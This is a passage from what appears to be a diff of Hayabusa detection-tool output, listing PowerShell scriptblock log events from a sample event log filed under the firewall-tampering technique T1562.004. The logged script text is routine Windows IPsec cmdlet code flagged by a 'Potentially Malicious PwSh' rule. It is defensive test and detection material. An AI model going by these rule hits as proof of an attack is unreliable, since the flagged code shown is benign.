'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { 